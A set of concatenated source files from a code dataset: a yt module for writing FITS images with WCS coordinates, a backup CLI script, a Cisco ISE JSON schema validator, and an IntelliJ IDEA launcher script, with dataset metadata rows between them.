xctr = 0.5*(img_data.bounds[1]+img_data.bounds[0]).to(units).v
yctr = 0.5*(img_data.bounds[3]+img_data.bounds[2]).to(units).v
center = [xctr, yctr]
cdelt = [dx, dy]
elif isinstance(img_data, YTCoveringGrid):
cdelt = img_data.dds.to(units).v
center = 0.5*(img_data.left_edge+img_data.right_edge).to(units).v
else:
# If img_data is just an array, we assume the center is the
# origin and use the image width to determine the cell widths
if not iterable(width):
width = [width]*self.dimensionality
if isinstance(width[0], YTQuantity):
cdelt = [wh.to(units).v/n for wh, n in zip(width, self.shape)]
else:
cdelt = [float(wh)/n for wh, n in zip(width, self.shape)]
center = [0.0]*self.dimensionality
w.wcs.crpix = 0.5*(np.array(self.shape)+1)
w.wcs.crval = center
w.wcs.cdelt = cdelt
w.wcs.ctype = ["linear"]*self.dimensionality
w.wcs.cunit = [units]*self.dimensionality
self.set_wcs(w)
else:
self.set_wcs(wcs)
def set_wcs(self, wcs, wcsname=None, suffix=None):
"""
Set the WCS coordinate information for all images
with a WCS object *wcs*.
"""
if wcsname is None:
wcs.wcs.name = 'yt'
else:
wcs.wcs.name = wcsname
h = wcs.to_header()
if suffix is None:
self.wcs = wcs
else:
setattr(self, "wcs"+suffix, wcs)
for img in self.hdulist:
for k, v in h.items():
kk = k
if suffix is not None:
kk += suffix
img.header[kk] = v
    def update_header(self, field, key, value):
        """
        Set the header card *key* to *value* for the image named *field*.
        If *field* == "all", every image header in this instance is
        updated.

        Raises
        ------
        KeyError
            If *field* is neither "all" nor the name of an image.
        """
        if field == "all":
            for img in self.hdulist:
                img.header[key] = value
        else:
            if field not in self.keys():
                raise KeyError("%s not an image!" % field)
            idx = self.fields.index(field)
            self.hdulist[idx].header[key] = value
def update_all_headers(self, key, value):
mylog.warning("update_all_headers is deprecated. "
"Use update_header('all', key, value) instead.")
self.update_header("all", key, value)
def keys(self):
return self.fields
def has_key(self, key):
return key in self.fields
def values(self):
return [self[k] for k in self.fields]
def items(self):
return [(k, self[k]) for k in self.fields]
def __getitem__(self, item):
return UnitfulHDU(self.hdulist[item])
def __repr__(self):
return str([self[k] for k in self.keys()])
def info(self, output=None):
"""
Summarize the info of the HDUs in this `FITSImageData`
instance.
Note that this function prints its results to the console---it
does not return a value.
Parameters
----------
output : file, boolean, optional
A file-like object to write the output to. If `False`, does not
output to a file and instead returns a list of tuples representing
the FITSImageData info. Writes to ``sys.stdout`` by default.
"""
hinfo = self.hdulist.info(output=False)
num_cols = len(hinfo[0])
if output is None:
output = sys.stdout
if num_cols == 8:
header = 'No. Name Ver Type Cards Dimensions Format Units'
format = '{:3d} {:10} {:3} {:11} {:5d} {} {} {}'
else:
header = 'No. Name Type Cards Dimensions Format Units'
format = '{:3d} {:10} {:11} {:5d} {} {} {}'
if self.hdulist._file is None:
name = '(No file associated with this FITSImageData)'
else:
name = self.hdulist._file.name
results = ['Filename: {}'.format(name), header]
for line in hinfo:
units = self.field_units[self.hdulist[line[0]].header['btype']]
summary = tuple(list(line[:-1]) + [units])
if output:
results.append(format.format(*summary))
else:
results.append(summary)
if output:
output.write('\n'.join(results))
output.write('\n')
output.flush()
else:
return results[2:]
@parallel_root_only
def writeto(self, fileobj, fields=None, overwrite=False, **kwargs):
r"""
Write all of the fields or a subset of them to a FITS file.
Parameters
----------
fileobj : string
The name of the file to write to.
fields : list of strings, optional
The fields to write to the file. If not specified
all of the fields in the buffer will be written.
clobber : overwrite, optional
Whether or not to overwrite a previously existing file.
Default: False
Additional keyword arguments are passed to
:meth:`~astropy.io.fits.HDUList.writeto`.
"""
if "clobber" in kwargs:
issue_deprecation_warning("The \"clobber\" keyword argument "
"is deprecated. Use the \"overwrite\" "
"argument, which has the same effect, "
"instead.")
overwrite = kwargs.pop("clobber")
if fields is None:
hdus = self.hdulist
else:
hdus = _astropy.pyfits.HDUList()
for field in fields:
hdus.append(self.hdulist[field])
hdus.writeto(fileobj, overwrite=overwrite, **kwargs)
def to_glue(self, label="yt", data_collection=None):
"""
Takes the data in the FITSImageData instance and exports it to
Glue (http://glueviz.org) for interactive analysis. Optionally
add a *label*. If you are already within the Glue environment, you
can pass a *data_collection* object, otherwise Glue will be started.
"""
from glue.core import DataCollection, Data
from glue.core.coordinates import coordinates_from_header
try:
from glue.app.qt.application import GlueApplication
except ImportError:
from glue.qt.glue_application import GlueApplication
image = Data(label=label)
image.coords = coordinates_from_header(self.wcs.to_header())
for k in self.fields:
image.add_component(self[k].data, k)
if data_collection is None:
dc = DataCollection([image])
app = GlueApplication(dc)
app.start()
else:
data_collection.append(image)
def to_aplpy(self, **kwargs):
"""
Use APLpy (http://aplpy.github.io) for plotting. Returns an
`aplpy.FITSFigure` instance. All keyword arguments are passed
to the `aplpy.FITSFigure` constructor.
"""
import aplpy
return aplpy.FITSFigure(self.hdulist, **kwargs)
def get_data(self, field):
"""
Return the data array of the image corresponding to *field*
with units attached. Deprecated.
"""
return self[field].data
    def set_unit(self, field, units):
        """
        Convert the image *field* to *units*, rewriting the stored array,
        the "bunit" header card, and the cached unit string.

        Raises
        ------
        KeyError
            If *field* is not one of the images in this instance.
        """
        if field not in self.keys():
            raise KeyError("%s not an image!" % field)
        idx = self.fields.index(field)
        # Attach the current units, convert, then store back bare values.
        new_data = YTArray(self.hdulist[idx].data,
                           self.field_units[field]).to(units)
        self.hdulist[idx].data = new_data.v
        self.hdulist[idx].header["bunit"] = units
        self.field_units[field] = units
    def pop(self, key):
        """
        Remove the image named *key* from this instance and return it
        wrapped in a new single-image FITSImageData.

        Raises
        ------
        KeyError
            If *key* is not one of the images in this instance.
        """
        if key not in self.keys():
            raise KeyError("%s not an image!" % key)
        idx = self.fields.index(key)
        im = self.hdulist.pop(idx)
        # Drop the bookkeeping entries before rewrapping the HDU.
        self.field_units.pop(key)
        self.fields.remove(key)
        data = _astropy.pyfits.HDUList([im])
        return FITSImageData(data)
def close(self):
self.hdulist.close()
@classmethod
def from_file(cls, filename):
"""
Generate a FITSImageData instance from one previously written to
disk.
Parameters
----------
filename : string
The name of the file to open.
"""
f = _astropy.pyfits.open(filename, lazy_load_hdus=False)
return cls(f)
@classmethod
def from_images(cls, image_list):
"""
Generate a new FITSImageData instance from a list of FITSImageData
instances.
Parameters
----------
image_list : list of FITSImageData instances
The images to be combined.
"""
w = image_list[0].wcs
img_shape = image_list[0].shape
data = []
first = True
for fid in image_list:
assert_same_wcs(w, fid.wcs)
if img_shape != fid.shape:
raise RuntimeError("Images do not have the same shape!")
for hdu in fid.hdulist:
if first:
data.append(hdu)
first = False
else:
data.append(_astropy.pyfits.ImageHDU(hdu.data, header=hdu.header))
data = _astropy.pyfits.HDUList(data)
return cls(data)
def create_sky_wcs(self, sky_center, sky_scale,
ctype=["RA---TAN","DEC--TAN"],
crota=None, cd=None, pc=None,
wcsname="celestial",
replace_old_wcs=True):
"""
Takes a Cartesian WCS and converts it to one in a
celestial coordinate system.
Parameters
----------
sky_center : iterable of floats
Reference coordinates of the WCS in degrees.
sky_scale : tuple or YTQuantity
Conversion between an angle unit and a length unit,
e.g. (3.0, "arcsec/kpc")
ctype : list of strings, optional
The type of the coordinate system to create.
crota : 2-element ndarray, optional
Rotation angles between cartesian coordinates and
the celestial coordinates.
cd : 2x2-element ndarray, optional
Dimensioned coordinate transformation matrix.
pc : 2x2-element ndarray, optional
Coordinate transformation matrix.
replace_old_wcs : boolean, optional
Whether or not to overwrite the default WCS of the
FITSImageData instance. If false, a second WCS will
be added to the header. Default: True.
"""
old_wcs = self.wcs
naxis = old_wcs.naxis
crval = [sky_center[0], sky_center[1]]
if isinstance(sky_scale, YTQuantity):
scaleq = sky_scale
else:
scaleq = YTQuantity(sky_scale[0],sky_scale[1])
if scaleq.units.dimensions != dimensions.angle/dimensions.length:
raise RuntimeError("sky_scale %s not in correct " % sky_scale +
"dimensions of angle/length!")
deltas = old_wcs.wcs.cdelt
units = [str(unit) for unit in old_wcs.wcs.cunit]
new_dx = (YTQuantity(-deltas[0], units[0])*scaleq).in_units("deg")
new_dy = (YTQuantity(deltas[1], units[1])*scaleq).in_units("deg")
new_wcs = _astropy.pywcs.WCS(naxis=naxis)
cdelt = [new_dx.v, new_dy.v]
cunit = ["deg"]*2
if naxis == 3:
crval.append(old_wcs.wcs.crval[2])
cdelt.append(old_wcs.wcs.cdelt[2])
ctype.append(old_wcs.wcs.ctype[2])
cunit.append(old_wcs.wcs.cunit[2])
new_wcs.wcs.crpix = old_wcs.wcs.crpix
new_wcs.wcs.cdelt = cdelt
new_wcs.wcs.crval = crval
new_wcs.wcs.cunit = cunit
new_wcs.wcs.ctype = ctype
if crota is not None:
new_wcs.wcs.crota = crota
if cd is not None:
new_wcs.wcs.cd = cd
if pc is not None:
new_wcs.wcs.cd = pc
if replace_old_wcs:
self.set_wcs(new_wcs, wcsname=wcsname)
else:
self.set_wcs(new_wcs, wcsname=wcsname, suffix="a")
class FITSImageBuffer(FITSImageData):
    # Alias subclass of FITSImageData -- presumably retained for backward
    # compatibility with the older class name; TODO confirm.
    pass
def sanitize_fits_unit(unit):
    # Normalize unit spellings for FITS output: downscale "Mpc" to "kpc"
    # (with a log message) and capitalize lowercase "au".
    if unit == "Mpc":
        mylog.info("Changing FITS file unit to kpc.")
        return "kpc"
    if unit == "au":
        return "AU"
    return unit
# For a cut along simulation axis i, axis_wcs[i] lists the two remaining
# axis indices forming the image plane (e.g. axis 2 -> planes 0 and 1).
axis_wcs = [[1,2],[0,2],[0,1]]
def construct_image(ds, axis, data_source, center, width=None, image_res=None):
    """Build a 2D WCS (and, when possible, a fixed-resolution buffer) for
    an image of *data_source* taken along *axis*.

    *axis* is either an integer axis index or, for off-axis images, an
    iterable normal vector. Returns a ``(wcs, frb)`` pair; *frb* is None
    when *data_source* has no ``to_frb`` method (e.g. a dict of already
    projected buffers).
    """
    if width is None:
        # No width given: image the entire domain in the plane
        # perpendicular to *axis*.
        width = ds.domain_width[axis_wcs[axis]]
        unit = ds.get_smallest_appropriate_unit(width[0])
        mylog.info("Making an image of the entire domain, "+
                   "so setting the center to the domain center.")
    else:
        width = ds.coordinates.sanitize_width(axis, width, None)
        unit = str(width[0].units)
    if image_res is None:
        # Default resolution from the effective finest grid of the dataset.
        ddims = ds.domain_dimensions*ds.refine_by**ds.index.max_level
        if iterable(axis):
            # Off-axis (normal vector): use the largest dimension for both.
            nx = ddims.max()
            ny = ddims.max()
        else:
            nx, ny = [ddims[idx] for idx in axis_wcs[axis]]
    else:
        if iterable(image_res):
            nx, ny = image_res
        else:
            nx, ny = image_res, image_res
    dx = width[0]/nx
    dy = width[1]/ny
    # Reference pixel at the image center (FITS CRPIX convention).
    crpix = [0.5*(nx+1), 0.5*(ny+1)]
    if unit == "unitary":
        unit = ds.get_smallest_appropriate_unit(ds.domain_width.max())
    elif unit == "code_length":
        unit = ds.get_smallest_appropriate_unit(ds.quan(1.0, "code_length"))
    unit = sanitize_fits_unit(unit)
    cunit = [unit]*2
    ctype = ["LINEAR"]*2
    cdelt = [dx.in_units(unit), dy.in_units(unit)]
    if iterable(axis):
        crval = center.in_units(unit)
    else:
        crval = [center[idx].in_units(unit) for idx in axis_wcs[axis]]
    if hasattr(data_source, 'to_frb'):
        if iterable(axis):
            # Off-axis source: to_frb is called without a center argument.
            frb = data_source.to_frb(width[0], (nx, ny), height=width[1])
        else:
            frb = data_source.to_frb(width[0], (nx, ny), center=center,
                                     height=width[1])
    else:
        # e.g. a dict of pre-computed image buffers — no FRB to build.
        frb = None
    w = _astropy.pywcs.WCS(naxis=2)
    w.wcs.crpix = crpix
    w.wcs.cdelt = cdelt
    w.wcs.crval = crval
    w.wcs.cunit = cunit
    w.wcs.ctype = ctype
    return w, frb
def assert_same_wcs(wcs1, wcs2):
    """Assert that two WCS objects describe the same coordinate system.

    Compares dimensionality, per-axis units and types, the core transform
    vectors (crpix, cdelt, crval), and — when present on both — the
    optional rotation/transform matrices (crota, cd, pc).
    """
    from numpy.testing import assert_allclose
    assert wcs1.naxis == wcs2.naxis
    for axis in range(wcs1.naxis):
        assert wcs1.wcs.cunit[axis] == wcs2.wcs.cunit[axis]
        assert wcs1.wcs.ctype[axis] == wcs2.wcs.ctype[axis]
    for attr in ("crpix", "cdelt", "crval"):
        assert_allclose(getattr(wcs1.wcs, attr), getattr(wcs2.wcs, attr))
    # Optional attributes: both missing is fine; one missing is a mismatch.
    for attr in ("crota", "cd", "pc"):
        first = getattr(wcs1.wcs, attr, None)
        second = getattr(wcs2.wcs, attr, None)
        if first is None or second is None:
            assert first == second
        else:
            assert_allclose(first, second)
class FITSSlice(FITSImageData):
    r"""Generate a FITSImageData of an on-axis slice.

    Parameters
    ----------
    ds : :class:`~yt.data_objects.static_output.Dataset`
        The dataset object.
    axis : character or integer
        The axis of the slice. One of "x", "y", "z", or 0, 1, 2.
    fields : string or list of strings
        The fields to slice.
    center : sequence of floats, string, or tuple, optional
        The coordinate of the center of the image. Accepts the usual yt
        forms: 'c'/'center' (domain center), 'max'/'m' (maximum of
        ('gas', 'density')), a ("min"/"max", field) tuple, a
        (coordinate, unit) tuple, or a YTArray. Plain lists or unitless
        arrays are interpreted in code units.
    width : tuple or float, optional
        The width of the image: a float (code units), a (value, unit)
        tuple, or a pair of either form for distinct x and y widths.
    image_res : int or 2-tuple of ints, optional
        The resolution of the image. If not provided, it is derived from
        the finest cell size of the dataset.

    Remaining keyword arguments are forwarded to ``Dataset.slice``.
    """
    def __init__(self, ds, axis, fields, center="c", width=None,
                 image_res=None, **kwargs):
        fields = ensure_list(fields)
        axis = fix_axis(axis, ds)
        center, dcenter = ds.coordinates.sanitize_center(center, axis)
        slice_source = ds.slice(axis, center[axis], **kwargs)
        wcs, frb = construct_image(ds, axis, slice_source, dcenter,
                                   width=width, image_res=image_res)
        super(FITSSlice, self).__init__(frb, fields=fields, wcs=wcs)
class FITSProjection(FITSImageData):
    r"""Generate a FITSImageData of an on-axis projection.

    Parameters
    ----------
    ds : :class:`~yt.data_objects.static_output.Dataset`
        The dataset object.
    axis : character or integer
        The axis along which to project. One of "x", "y", "z", or 0, 1, 2.
    fields : string or list of strings
        The fields to project.
    weight_field : string, optional
        The field used to weight the projection.
    center : sequence of floats, string, or tuple, optional
        The coordinate of the center of the image. Accepts the usual yt
        forms: 'c'/'center' (domain center), 'max'/'m' (maximum of
        ('gas', 'density')), a ("min"/"max", field) tuple, a
        (coordinate, unit) tuple, or a YTArray. Plain lists or unitless
        arrays are interpreted in code units.
    width : tuple or float, optional
        The width of the image: a float (code units), a (value, unit)
        tuple, or a pair of either form for distinct x and y widths.
    image_res : int or 2-tuple of ints, optional
        The resolution of the image. If not provided, it is derived from
        the finest cell size of the dataset.

    Remaining keyword arguments are forwarded to ``Dataset.proj``.
    """
    def __init__(self, ds, axis, fields, center="c", width=None,
                 weight_field=None, image_res=None, **kwargs):
        fields = ensure_list(fields)
        axis = fix_axis(axis, ds)
        center, dcenter = ds.coordinates.sanitize_center(center, axis)
        projection = ds.proj(fields[0], axis, weight_field=weight_field,
                             **kwargs)
        wcs, frb = construct_image(ds, axis, projection, dcenter,
                                   width=width, image_res=image_res)
        super(FITSProjection, self).__init__(frb, fields=fields, wcs=wcs)
class FITSOffAxisSlice(FITSImageData):
    r"""Generate a FITSImageData of an off-axis slice.

    Parameters
    ----------
    ds : :class:`~yt.data_objects.static_output.Dataset`
        The dataset object.
    normal : a sequence of floats
        The vector normal to the slicing plane.
    fields : string or list of strings
        The fields to slice.
    center : sequence of floats, string, or tuple, optional
        The coordinate of the center of the image. Accepts the usual yt
        forms: 'c'/'center' (domain center), 'max'/'m' (maximum of
        ('gas', 'density')), a ("min"/"max", field) tuple, a
        (coordinate, unit) tuple, or a YTArray. Plain lists or unitless
        arrays are interpreted in code units.
    width : tuple or float, optional
        The width of the image: a float (code units), a (value, unit)
        tuple, or a pair of either form for distinct x and y widths.
    image_res : int or 2-tuple of ints, optional
        The resolution of the image. Default: 512.
    north_vector : a sequence of floats, optional
        A vector defining the 'up' direction in the plot, fixing the
        orientation of the slicing plane. If not set, an arbitrary
        grid-aligned north-vector is chosen.
    """
    def __init__(self, ds, normal, fields, center='c', width=None,
                 image_res=512, north_vector=None):
        fields = ensure_list(fields)
        center, dcenter = ds.coordinates.sanitize_center(center, 4)
        cutting_plane = ds.cutting(normal, center, north_vector=north_vector)
        # The cutting plane's own frame is centered on the origin.
        center = ds.arr([0.0] * 2, 'code_length')
        wcs, frb = construct_image(ds, normal, cutting_plane, center,
                                   width=width, image_res=image_res)
        super(FITSOffAxisSlice, self).__init__(frb, fields=fields, wcs=wcs)
class FITSOffAxisProjection(FITSImageData):
    r"""Generate a FITSImageData of an off-axis projection.

    Parameters
    ----------
    ds : :class:`~yt.data_objects.static_output.Dataset`
        The dataset object corresponding to the simulation output.
    normal : a sequence of floats
        The vector normal to the projection plane.
    fields : string or list of strings
        The name of the field(s) to be plotted.
    center : sequence of floats, string, or tuple, optional
        The coordinate of the center of the image. Accepts the usual yt
        forms: 'c'/'center' (domain center), 'max'/'m' (maximum of
        ('gas', 'density')), a ("min"/"max", field) tuple, a
        (coordinate, unit) tuple, or a YTArray. Plain lists or unitless
        arrays are interpreted in code units.
    width : tuple or float, optional
        The width of the image: a float (code units), a (value, unit)
        tuple, or a pair of either form for distinct x and y widths.
    depth : tuple or float, optional
        The depth to project through, as (value, 'unit') or a float in
        code units.
    weight_field : string, optional
        The name of the weighting field. Set to None for no weight.
    image_res : int or 2-tuple of ints, optional
        The resolution of the image. Default: 512.
    north_vector : a sequence of floats, optional
        A vector defining the 'up' direction, fixing the orientation of
        the projection plane.
    method : string, optional
        Projection method: "integrate" (optionally weighted by
        *weight_field*) or "sum" (plain summation with no path-length
        factor; only appropriate for uniform-resolution grids).
    data_source : yt.data_objects.data_containers.YTSelectionContainer, optional
        If specified, the data source used for selecting regions to
        project; defaults to the whole dataset.
    """
    def __init__(self, ds, normal, fields, center='c', width=(1.0, 'unitary'),
                 weight_field=None, image_res=512, data_source=None,
                 north_vector=None, depth=(1.0, "unitary"), method='integrate'):
        fields = ensure_list(fields)
        center, dcenter = ds.coordinates.sanitize_center(center, 4)
        width = ds.coordinates.sanitize_width(normal, width, depth)
        # Width/height/depth in raw code-length values for the projector.
        dims = tuple(extent.in_units('code_length').v for extent in width)
        if not iterable(image_res):
            image_res = (image_res, image_res)
        resolution = (image_res[0], image_res[1])
        source = ds if data_source is None else data_source
        # Project every requested field; swapaxes(0, 1) transposes each
        # projected buffer, matching the layout FITSImageData expects.
        buffers = {}
        for field in fields:
            projected = off_axis_projection(source, center, normal, dims,
                                            resolution, field,
                                            north_vector=north_vector,
                                            method=method,
                                            weight=weight_field)
            buffers[field] = projected.swapaxes(0, 1)
        # The projected image frame is centered on the origin.
        center = ds.arr([0.0] * 2, 'code_length')
        wcs, _unused_frb = construct_image(ds, normal, buffers, center,
                                           width=width, image_res=image_res)
        super(FITSOffAxisProjection, self).__init__(buffers, fields=fields,
                                                    wcs=wcs)
| 42.257525 | 98 | 0.565361 |
f51c10b75c2043f6e61e0dbf4006ed5364f7fbcb | 925 | py | Python | src/auto_backup.py | polmonroig/auto_backup | c484ceb4df27990af0ba8fee6417780cb603150d | [
"MIT"
] | null | null | null | src/auto_backup.py | polmonroig/auto_backup | c484ceb4df27990af0ba8fee6417780cb603150d | [
"MIT"
] | null | null | null | src/auto_backup.py | polmonroig/auto_backup | c484ceb4df27990af0ba8fee6417780cb603150d | [
"MIT"
] | null | null | null | #!/usr/bin/python3
from version import __version__
from parser import Parser
from database import ProjectDatabase
import os
import sys
def interactive(database):
    """Run an interactive backup session.

    First applies every action listed in the '.config' file that sits in
    this script's directory, then processes user actions from the parser
    loop until it ends.
    """
    parser = Parser()
    # Resolve the .config file next to this script.  The original code
    # rebuilt the absolute path by splitting on '/' and re-joining each
    # component, which is redundant and breaks on non-POSIX separators;
    # a single os.path.join on the resolved directory is equivalent.
    script_dir = os.path.dirname(os.path.realpath(__file__))
    init_file = os.path.join(script_dir, '.config')
    for action in parser.read_file(init_file):
        database.interact(action)
    for action in parser.loop():
        database.interact(action)
def scripting(database):
    """Non-interactive mode: execute every action found in the script
    file named by the first command-line argument."""
    script_path = sys.argv[1]
    script_parser = Parser()
    for action in script_parser.read_file(script_path):
        database.interact(action)
def main():
    """Entry point: print a banner, then run in scripted mode when a
    script path argument is present, otherwise interactively."""
    print('Backup utility', __version__)
    database = ProjectDatabase()
    run_mode = scripting if len(sys.argv) >= 2 else interactive
    run_mode(database)


if __name__ == '__main__':
    main()
| 23.125 | 53 | 0.662703 |
aa6dab182a7914b15841b8011da84dbb72bdae19 | 3,187 | py | Python | tests/models/validators/v3_0_0/jsd_f52605b5f6481f6a99ec8a7e8e6.py | oianson/ciscoisesdk | c8fe9d80416048dd0ff2241209c4f78ab78c1a4a | [
"MIT"
] | null | null | null | tests/models/validators/v3_0_0/jsd_f52605b5f6481f6a99ec8a7e8e6.py | oianson/ciscoisesdk | c8fe9d80416048dd0ff2241209c4f78ab78c1a4a | [
"MIT"
] | null | null | null | tests/models/validators/v3_0_0/jsd_f52605b5f6481f6a99ec8a7e8e6.py | oianson/ciscoisesdk | c8fe9d80416048dd0ff2241209c4f78ab78c1a4a | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
"""Identity Services Engine getTelemetryInfoById data model.
Copyright (c) 2021 Cisco and/or its affiliates.
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
"""
from __future__ import (
absolute_import,
division,
print_function,
unicode_literals,
)
import fastjsonschema
import json
from ciscoisesdk.exceptions import MalformedRequest
from builtins import *
class JSONSchemaValidatorF52605B5F6481F6A99Ec8A7E8E6(object):
    """getTelemetryInfoById request schema definition."""
    def __init__(self):
        super(JSONSchemaValidatorF52605B5F6481F6A99Ec8A7E8E6, self).__init__()
        # Compile the embedded JSON schema once at construction time.
        # The .replace() strips a 16-space indentation prefix that the
        # code generator emits before each schema line; JSON whitespace
        # is insignificant, so this is purely cosmetic.
        self._validator = fastjsonschema.compile(json.loads(
            '''{
"$schema": "http://json-schema.org/draft-04/schema#",
"properties": {
"TelemetryInfo": {
"properties": {
"deploymentId": {
"type": "string"
},
"id": {
"type": "string"
},
"link": {
"properties": {
"href": {
"type": "string"
},
"rel": {
"type": "string"
},
"type": {
"type": "string"
}
},
"required": [
"rel",
"href",
"type"
],
"type": "object"
},
"status": {
"type": "string"
},
"udiSN": {
"type": "string"
}
},
"type": "object"
}
},
"required": [
"TelemetryInfo"
],
"type": "object"
}'''.replace("\n" + ' ' * 16, '')
        ))

    def validate(self, request):
        """Validate *request* against the schema, raising MalformedRequest
        (wrapping the fastjsonschema failure message) when it does not
        conform."""
        try:
            self._validator(request)
        except fastjsonschema.exceptions.JsonSchemaException as e:
            raise MalformedRequest(
                '{} is invalid. Reason: {}'.format(request, e.message)
            )
| 32.191919 | 78 | 0.54534 |
cb9bcfbbb30db5822b8574bcf9489b251dba37fc | 3,120 | py | Python | src/idea/idea_start.py | AldrichYang/HelloPython3 | de3d3f3cf293980a7e11aaa488a2621035efc599 | [
"Apache-2.0"
] | null | null | null | src/idea/idea_start.py | AldrichYang/HelloPython3 | de3d3f3cf293980a7e11aaa488a2621035efc599 | [
"Apache-2.0"
] | null | null | null | src/idea/idea_start.py | AldrichYang/HelloPython3 | de3d3f3cf293980a7e11aaa488a2621035efc599 | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import socket
import struct
import sys
import os
import time
# see com.intellij.idea.SocketLock for the server side of this interface
# Install location of the IDE application bundle (macOS .app path).
RUN_PATH = u'/Applications/IntelliJ IDEA.app'
# Per-version config directory; holds the 'port' file of a running instance.
CONFIG_PATH = u'/Users/user/Library/Preferences/IntelliJIdea2018.1'
# Per-version cache directory; holds the activation 'token' file.
SYSTEM_PATH = u'/Users/user/Library/Caches/IntelliJIdea2018.1'
def print_usage(cmd):
    """Print the command-line usage summary for *cmd* to stdout."""
    usage_lines = (
        'Usage:',
        ' {0} -h | -? | --help',
        ' {0} [project_dir]',
        ' {0} [-l|--line line] [project_dir|--temp-project] file[:line]',
        ' {0} diff <left> <right>',
        ' {0} merge <local> <remote> [base] <merged>',
    )
    print('\n'.join(usage_lines).format(cmd))
def process_args(argv):
    """Normalize raw command-line arguments for hand-off to the IDE.

    Help flags print usage and exit. 'diff'/'merge'/'--temp-project' are
    kept verbatim when first; '-l'/'--line' passes its following value
    through untouched; 'file:NN' suffixes become '-l NN file'; every
    remaining argument is converted to an absolute path.
    """
    processed = []
    consume_literal = False
    for idx, token in enumerate(argv[1:]):
        if token in ('-h', '-?', '--help'):
            print_usage(argv[0])
            exit(0)
        elif idx == 0 and token in ('diff', 'merge', '--temp-project'):
            processed.append(token)
        elif token in ('-l', '--line'):
            processed.append(token)
            consume_literal = True
        elif consume_literal:
            # Value following -l/--line: pass through as-is.
            processed.append(token)
            consume_literal = False
        else:
            path = token
            if ':' in token:
                candidate, maybe_line = token.rsplit(':', 1)
                if maybe_line.isdigit():
                    processed.append('-l')
                    processed.append(maybe_line)
                    path = candidate
            processed.append(os.path.abspath(path))
    return processed
def try_activate_instance(args):
    """Try to hand *args* to an already-running IDE instance.

    Reads the running instance's listening port (CONFIG_PATH/port) and
    activation token (SYSTEM_PATH/token), connects on localhost, waits
    until the server announces a config path matching CONFIG_PATH, then
    sends an 'activate' command.  Returns True if the command was sent,
    False otherwise.
    """
    port_path = os.path.join(CONFIG_PATH, 'port')
    token_path = os.path.join(SYSTEM_PATH, 'token')
    if not (os.path.exists(port_path) and os.path.exists(token_path)):
        # No running instance has published its port/token.
        return False
    with open(port_path) as pf:
        port = int(pf.read())
    with open(token_path) as tf:
        token = tf.read()
    s = socket.socket()
    s.settimeout(0.3)
    try:
        s.connect(('127.0.0.1', port))
    except (socket.error, IOError):
        return False
    found = False
    while True:
        try:
            # Each server message: big-endian 16-bit length, then a
            # UTF-8 encoded config path.
            path_len = struct.unpack('>h', s.recv(2))[0]
            path = s.recv(path_len).decode('utf-8')
            if os.path.abspath(path) == os.path.abspath(CONFIG_PATH):
                found = True
                break
        except (socket.error, IOError):
            # Timeout or connection error: no matching instance answered.
            return False
    if found:
        # NUL-separated command: 'activate <token>\0<cwd>\0<arg1>\0...'
        cmd = 'activate ' + token + '\0' + os.getcwd() + '\0' + '\0'.join(args)
        if sys.version_info.major >= 3: cmd = cmd.encode('utf-8')
        # Frame the command the same way: 16-bit length prefix.
        encoded = struct.pack('>h', len(cmd)) + cmd
        s.send(encoded)
        time.sleep(0.5)  # don't close the socket immediately
        return True
    return False
def start_new_instance(args):
    """Replace the current process with a fresh IDE instance.

    On success this never returns (os.exec* replaces the process image).
    """
    if sys.platform == 'darwin':
        # macOS: launch the .app bundle through `open`; program arguments
        # must follow an '--args' marker.
        if args:
            args.insert(0, '--args')
        os.execvp('open', ['-a', RUN_PATH] + args)
    else:
        launcher_name = os.path.split(RUN_PATH)[1]
        os.execv(RUN_PATH, [launcher_name] + args)
# Script entry: normalize the CLI arguments, then try to hand them to an
# already-running IDE instance; fall back to exec'ing a new one.
ide_args = process_args(sys.argv)
if not try_activate_instance(ide_args):
    start_new_instance(ide_args)
| 28.363636 | 85 | 0.546795 |
7282cd43987729ea642d1583bf120e197cdcc79d | 420 | py | Python | src/bullet_point/migrations/0006_bulletpoint_sift_risk_score.py | ResearchHub/ResearchHub-Backend-Open | d36dca33afae2d442690694bb2ab17180d84bcd3 | [
"MIT"
] | 18 | 2021-05-20T13:20:16.000Z | 2022-02-11T02:40:18.000Z | src/bullet_point/migrations/0006_bulletpoint_sift_risk_score.py | ResearchHub/ResearchHub-Backend-Open | d36dca33afae2d442690694bb2ab17180d84bcd3 | [
"MIT"
] | 109 | 2021-05-21T20:14:23.000Z | 2022-03-31T20:56:10.000Z | src/bullet_point/migrations/0006_bulletpoint_sift_risk_score.py | ResearchHub/ResearchHub-Backend-Open | d36dca33afae2d442690694bb2ab17180d84bcd3 | [
"MIT"
] | 4 | 2021-05-17T13:47:53.000Z | 2022-02-12T10:48:21.000Z | # Generated by Django 2.2 on 2020-11-07 01:03
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('bullet_point', '0005_bulletpoint_created_location'),
]
operations = [
migrations.AddField(
model_name='bulletpoint',
name='sift_risk_score',
field=models.FloatField(blank=True, null=True),
),
]
| 22.105263 | 62 | 0.62619 |
a3b9a63ea5826bb1960b8ed7c191ae8d57b843c8 | 7,060 | py | Python | backend/apps/easyaudit/tests/test_app/tests.py | bopopescu/Journey | 654eb66e0e2df59e916eff4c75b68b183f9b58b5 | [
"MIT"
] | 41 | 2019-01-02T09:36:54.000Z | 2022-02-20T13:13:05.000Z | backend/apps/easyaudit/tests/test_app/tests.py | bopopescu/Journey | 654eb66e0e2df59e916eff4c75b68b183f9b58b5 | [
"MIT"
